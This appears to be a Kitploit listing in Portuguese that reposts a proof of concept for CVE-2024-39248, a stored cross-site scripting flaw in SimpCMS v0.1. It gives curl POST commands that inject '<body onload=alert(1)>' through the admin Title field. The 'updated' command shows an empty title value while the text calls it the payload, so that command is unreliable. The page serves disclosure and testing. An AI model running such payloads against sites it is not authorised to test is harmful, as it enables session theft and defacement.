Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2024-39248 — Publicação para Cross Site Scripting (XSS) no SimpCMS v0.1 - /SimpCMS/admin.php | Kitploit
Ferramentas/GitHubGitHub/jasonthename/cve-2024-39248
Análise de VulnerabilidadesExploraçãoExploração de Aplicações WebSegurança WebTestes de Penetração
GitHubjasonthename/cve-2024-39248

CVE-2024-39248

Publicação para Cross Site Scripting (XSS) no SimpCMS v0.1 - /SimpCMS/admin.php

Ver Repositório
1há 2 anosAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

Título do Exploit: SimpCMS v0.1 - Cross Site Scripting (XSS)

CVE: CVE-2024-39248

Autor do Exploit: Jason Jacobs (0xjason_jacobs - Twitter)

Página inicial do fornecedor: https://sourceforge.net/projects/simpcms/

Endpoint vulnerável: /SimpCMS/admin.php

Uma vulnerabilidade de cross-site scripting (XSS) no SimpCMS v0.1 permite que atacantes executem scripts web arbitrários ou HTML por meio de um payload malicioso injetado no campo Title em /admin.php.

Parâmetros do comando cURL atualizados para a versão do SimpCMS no SourceForge:

Após efetuar login na interface de administração do SimpCMS, copie seus respectivos valores de Cookie observados na aba Application do Inspect do navegador e envie a seguinte requisição curl:

curl -X POST "http://site.com/SimpCMS/admin/index.php" -d "title=&abbrev=random&newSector=" -b "PHPSESSID=c4v4tjh5fpv4po3k5dp5mrb8r0"

command

poc

Parâmetros da submissão inicial do CVE (O mesmo exploit funciona):

Os parâmetros iniciais observados para o software SimpCMS resultaram no seguinte comando cURL, que foi posteriormente atualizado:

curl -X POST "http://site.com/SimpCMS/admin.php" -d "title=%3Cbody+onload%3Dalert%281%29%3E&text=ee&cat=something&main=1&submit=submit" -b "username=admin; password=PARAMVALUE"

Explicação:

  • curl: A ferramenta de linha de comando para transferir dados com URLs.
  • -X POST: Especifica o método de requisição a ser usado (POST).
  • "http://site.com/SimpCMS/admin.php": A URL para a qual a requisição é enviada.
  • -d "title=&abbrev=random&newSector=" -b "PHPSESSID=c4v4tjh5fpv4po3k5dp5mrb8r0" - O payload da requisição POST.

Execute este comando no seu terminal para enviar a requisição POST com o payload de XSS. Acesse o site principal /SimpCMS e o XSS ficará visível.

CWE: https://cwe.mitre.org/data/definitions/79.html

Baixar ferramenta